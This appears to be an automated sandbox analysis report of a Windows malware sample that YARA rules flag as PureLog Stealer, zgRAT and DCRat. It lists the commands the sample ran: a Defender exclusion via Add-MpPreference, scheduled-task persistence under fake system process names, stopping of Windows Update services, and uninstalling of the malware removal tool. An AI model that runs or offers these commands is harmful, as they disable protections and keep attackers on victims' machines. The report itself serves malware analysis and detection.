                                                      ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                      NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                      NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                      ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                      ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                      RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                      NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                      ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                      ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:10:31:53
                                                      Start date:25/04/2024
                                                      Path:C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe"
                                                      Imagebase:0x7ff7f4d60000
                                                      File size:6'701'051 bytes
                                                      MD5 hash:6ACBB1FB58DCCD74DB667187B22DE689
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:1
                                                      Start time:10:31:54
                                                      Start date:25/04/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\GargantuaN.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Local\Temp\GargantuaN.exe"
                                                      Imagebase:0xd50000
                                                      File size:2'289'873 bytes
                                                      MD5 hash:B3CEE15E9FDDC0E7DC33069319B549D6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1637953778.0000000006D7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1638428127.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 53%, ReversingLabs
                                                      • Detection: 53%, Virustotal, Browse
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:10:31:54
                                                      Start date:25/04/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\GargantuanS.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\AppData\Local\Temp\GargantuanS.exe"
                                                      Imagebase:0x7ff7a2250000
                                                      File size:5'475'840 bytes
                                                      MD5 hash:7A568EF3F46D369F3D3FFD68FDF68573
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 81%, ReversingLabs
                                                      • Detection: 61%, Virustotal, Browse
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:10:31:54
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe"
                                                      Imagebase:0x590000
                                                      File size:147'456 bytes
                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:10:31:59
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                      Imagebase:0x7ff788560000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:10:31:59
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:10:32:00
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\PerfDll\vvkzdvmSUM14jiAzc.bat" "
                                                      Imagebase:0x240000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:7
                                                      Start time:10:32:00
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:8
                                                      Start time:10:32:00
                                                      Start date:25/04/2024
                                                      Path:C:\PerfDll\hyperProviderSavesinto.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\PerfDll/hyperProviderSavesinto.exe"
                                                      Imagebase:0x7b0000
                                                      File size:1'968'128 bytes
                                                      MD5 hash:3997D7D058AF3C1B6C9ABB57F6FA1F2A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000000.1698928747.00000000007B2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1741648776.0000000012DCC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\PerfDll\hyperProviderSavesinto.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\PerfDll\hyperProviderSavesinto.exe, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 88%, ReversingLabs
                                                      • Detection: 74%, Virustotal, Browse
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:9
                                                      Start time:10:32:02
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                      Imagebase:0x7ff693ab0000
                                                      File size:496'640 bytes
                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:10
                                                      Start time:10:32:02
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 7 /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:11
                                                      Start time:10:32:02
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /rl HIGHEST /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:12
                                                      Start time:10:32:02
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 14 /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /rl HIGHEST /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:13
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Recovery\WmiPrvSE.exe'" /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:14
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:15
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:16
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:17
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /rl HIGHEST /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:18
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /rl HIGHEST /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:19
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\RuntimeBroker.exe'" /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:20
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe"
                                                      Imagebase:0xa40000
                                                      File size:1'968'128 bytes
                                                      MD5 hash:3997D7D058AF3C1B6C9ABB57F6FA1F2A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 88%, ReversingLabs
                                                      • Detection: 74%, Virustotal, Browse
                                                      Has exited:false

                                                      General

                                                      Target ID:21
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff7f7180000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:22
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:23
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                      Imagebase:0x7ff635830000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:24
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:25
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:26
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe"
                                                      Imagebase:0x950000
                                                      File size:1'968'128 bytes
                                                      MD5 hash:3997D7D058AF3C1B6C9ABB57F6FA1F2A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:27
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:28
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\wusa.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff7a9260000
                                                      File size:345'088 bytes
                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:29
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 8 /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:31
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                      Imagebase:0x7ff635830000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:32
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:33
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /rl HIGHEST /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:35
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 11 /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /rl HIGHEST /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:36
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                      Imagebase:0x7ff635830000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:37
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:38
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat"
                                                      Imagebase:0x7ff7f7180000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:39
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop bits
                                                      Imagebase:0x7ff635830000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:40
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:41
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:42
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\chcp.com
                                                      Wow64 process (32bit):false
                                                      Commandline:chcp 65001
                                                      Imagebase:0x7ff711110000
                                                      File size:14'848 bytes
                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:43
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                      Imagebase:0x7ff635830000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:44
                                                      Start time:10:32:04
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:45
                                                      Start time:10:32:04
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\PING.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:ping -n 10 localhost
                                                      Imagebase:0x7ff71e300000
                                                      File size:22'528 bytes
                                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:46
                                                      Start time:10:32:04
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\dialer.exe
                                                      Wow64 process (32bit):false
